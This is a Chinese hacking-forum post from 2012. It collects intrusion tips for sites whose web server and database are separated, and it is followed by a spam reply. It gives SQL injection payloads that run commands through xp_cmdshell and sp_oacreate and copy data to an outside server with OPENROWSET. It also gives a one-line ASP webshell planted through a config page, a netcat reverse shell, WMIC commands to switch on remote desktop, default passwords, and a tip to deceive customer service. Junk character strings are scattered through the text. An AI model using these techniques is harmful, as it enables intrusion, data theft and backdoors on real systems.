找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3978|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关6 u4 F7 \! U3 p- k
2 G* Z) \* ]7 @/ g

$ E, ~, b8 `2 S" j9 w- @: ?SA点数据库分离搞法+语句:  q, @' {" Z  G" g! E

6 k( ]/ q3 H2 H+ c& W注射点不显错,执行下面三条语句页面都返回正常。
+ _! J' h9 \/ m  u, uand 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
  L8 w8 ~7 m9 J) wand 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
6 Q' G0 }3 d  _& K- @1 Oand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')8 e" ], h+ N5 [" L5 k
可以列目录,判断系统为2000,web与数据库分离
9 m) m& ^5 }9 O9 R4 l遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
, j+ z( ]' ~9 K在注射点上执行$ O9 h; Q) F, b: p( l& ^8 _. d- s1 f( @
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
8 P$ k0 D, V+ p页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
4 C4 I& P! U- P! C还有我用NC监听得其他端口都没有得到IP。5 E$ z; b# _. V# f# S$ q
5 p2 s6 B' X5 L2 n" L$ k2 ~$ X4 Q
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
  K7 K1 v7 @" k! y'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
4 j: s- n% J( z7 s( }8 G2 F7 Y* Z6 U- B) q
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
/ {4 M" `! x5 i( Q& ~4 d$ e: d- W% a$ _- Y: x
现在就猜想是不是数据库是内网而且不能连外网。. E% q! ]9 n, u' s
/ L. x' Q* |0 b( X: q
- q4 v& y1 o  O5 C- N# Q
access导出txt文本代码
% e! [) j: M, p7 R5 s1 o; mSELECT * into [test.txt] in 'd:\web\' 'text;' from admin
  \) O! C2 [" y; t3 N) y; e% x- y, M" W+ L
8 l4 ~) C5 Z( }! i7 }  A+ O* a* p
% ]* O* `4 d, l9 x3 b
自动跳转到指定网站代码头- b7 @8 H3 f! q& \, g# o6 s- E7 M
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
. F* O3 _2 n. \) v$ w% W% S4 a7 r- v* ]& i

" i8 w' d9 x1 S* R4 C入侵java or jsp站点时默认配置文件路径:* G  C3 m( ]$ m5 \
\web-inf\web.xml
5 c/ r, X& Q4 D0 o/ Ttomcat下的配置文件位置:" r9 S5 a) Y9 ]. x2 E8 h; {0 V
\conf\server.xml            (前面加上tomcat路径)
7 j9 F( U; h; k. m& J0 I3 e3 x\Tomcat 5.0\webapps\root\web-inf\struts-config.xml! `: {' V: q5 I
6 O$ F+ K" d) ?4 X( ^

: ?7 E" M% ?  _! w+ L- g* Z2 v' E( W. v% s* v  s
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:: G9 z/ T: C6 P! ~  b6 X. k
-1%234 @8 h- u: ^- Z* \6 ~9 \1 F6 w) L
>
# t- v. w, t$ N2 n! n* P<- u! j! H/ s. C; @( w* t
1'+or+'1'='1
- t6 v( L( z0 Y/ O) j- k7 _1 nid=8%bf
$ L+ E( T8 W  W% T; q
. b, G, {/ O' ]# k: O% x全新注入点检测试法:2 h2 _( u( O0 l8 L& }6 H4 _3 [! B) E
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。* F+ `6 n% v) v4 N
- B4 M+ k( }) H$ J* [
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
2 u# v5 H& h  {8 {9 i* L7 q0 m5 W1 ]6 ^! \. O. t' p4 Y
搜索型注入判断方法:
; K3 w; t! _6 q8 s北京%' and '1'='1' and '%'='
# p( {& L/ @: F8 }& i1 i$ h2 k北京%' and '1'='2' and '%'='4 B% S( ?7 ]2 B. c/ m( A
6 \# H  A+ c1 O! |/ c' a  d

, ?" r6 A! L( l$ t, PCOOKIES注入:* ]  g/ M' E# B% r  X8 H
8 Q5 {. Q5 }2 A6 A. N5 ~+ N3 l
javascript:alert(document.cookie="id="+escape("51 and 1=1"));& ]3 N$ m* C! K8 v# a# ]' s
( Q* T1 Z+ A2 @8 b/ a9 O8 _3 e
2000专业版查看本地登录用户命令:3 ]: g; |( B+ ?' W- ~
net config workstation9 p$ L' N: W3 \9 K
2 c( _' z, w8 x

! q) m! R2 |! n! C4 J0 `0 S- m2003下查看ipsec配置和默认防火墙配置命令:
9 n5 N8 X) U/ R, ~$ {9 D$ ~netsh firewall show config
, Q- E6 o; I. \' u6 W) }netsh ipsec static show all7 y# A- q$ W' V% S. Q8 H6 I# s$ S
- I) r% i* {) v4 l2 @. T7 y1 k
不指派指定策略命令:: R- _$ Y+ E1 U6 Y
netsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
' J$ H) u7 \, k! {- H4 @netsh ipsec static show policy all  显示策略名
' c* T$ T* R& ^; ]; h( u- r  Q. g& ^1 i% Y
! ]. k: s& j+ O" X; |
猜管理员后台小技巧:
! _, N4 @% m! V0 ]admin/left.asp
& L# _; K7 L0 q  \) Sadmin/main.asp0 t, L4 p0 c( S; X, u- h
admin/top.asp9 s& L% X% q8 P7 i
admin/admin.asp
  Z7 O* g: N6 s, b" ?会现出菜单导航,然后迅雷下载全部链接
# X  k5 O/ z8 B+ R0 ?
* \3 m3 U0 \6 A9 H* R
$ w8 i& o1 L2 Q2 d社会工程学:1 [: V; E+ D" J
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人( z6 c& g4 o! B
然后去骗客服
# q  f/ v: j9 U0 _5 x2 _% s" \6 k2 a7 f% o9 g# d9 v
: K! N# o" }1 i4 k( q
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: 9 ?6 a& {9 s% V! ~
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
% D- p7 j6 Q5 s) e$ l  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
% l% {+ `6 e: U7 l8 X2 n7 W  Y/ K- p1 M  g; V) B
& Q0 K( t1 K% s' q' l0 x) o( U

# ~7 q5 Y) C! A6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)5 l8 h2 H: N3 Z

& S' |/ w, B! P1 o0 |* ]3 a3 }/ N! Q. `3 d, o0 o' L: C
+ E! j: y7 h% D* X: O4 X
CMD加密注册表位置
0 F0 w3 u0 Y+ S+ }) T: j(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor( q% g+ L+ j7 j( ^) ]. ^, T% n. B
AutoRun
+ T& u% ?/ |! l
- }+ }6 [7 t( @* }% p. W. V- \(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor% z. r5 ?: L. N
AutoRun
8 B2 @0 l. h5 Y  v* p& g3 j1 y8 [4 q0 a3 i3 Y7 B  z

$ d2 r0 p; z4 Z$ u7 i9 c/ X3 I在找注入时搜索Hidden,把他改成test1 {8 d- d2 j3 r2 W
3 x9 M3 y, f3 g/ B

3 ?. a/ ~- s; D+ Y
( R9 J$ q. a) T" Y$ H6 xmstsc /v:IP /console
$ j8 `! r' K% D; D0 K' ~: Q5 z
/ L$ w2 n+ j- k6 P9 f# r' @. P1 V( G; v
一句话开3389:0 l- U' N6 N+ I: x
4 ?; o. e2 `9 q( L( Q* ]0 d0 T
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  2 B! X5 h( u' R1 ]1 e2 q% i
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
* e/ r/ ?8 Y4 G. E: G: ~8 M& z- o! n* ^7 Z; e* [) R, n

4 G: |. C" b) M; q! w知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:+ ~" M3 }) @6 g  X
Insert into admin(user,pwd) values('test','test')
- e& P+ H7 e# h- |$ z
  B. S! O5 i! H- o. }4 E4 S# w8 o0 `# _: H7 L
NC反弹
; s4 v) O8 B$ x8 u先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   4 b) A* b$ `# L6 M; J3 _  I
然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
) L( ~/ z3 K# \8 ?# L6 N+ w3 T( w$ n' G' }
& |/ L- ~- ^& X) B9 p, A0 u
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
; U) O7 a' N; n- z; v
4 G3 v: X$ c5 L; r有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录: v7 _" [  u4 [, I* x' Y3 p
例如:
; K9 T+ @* m/ Ksubst k: d:\www\ 用d盘www目录替代k盘( n; g0 D1 G# ]8 n* F
subst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表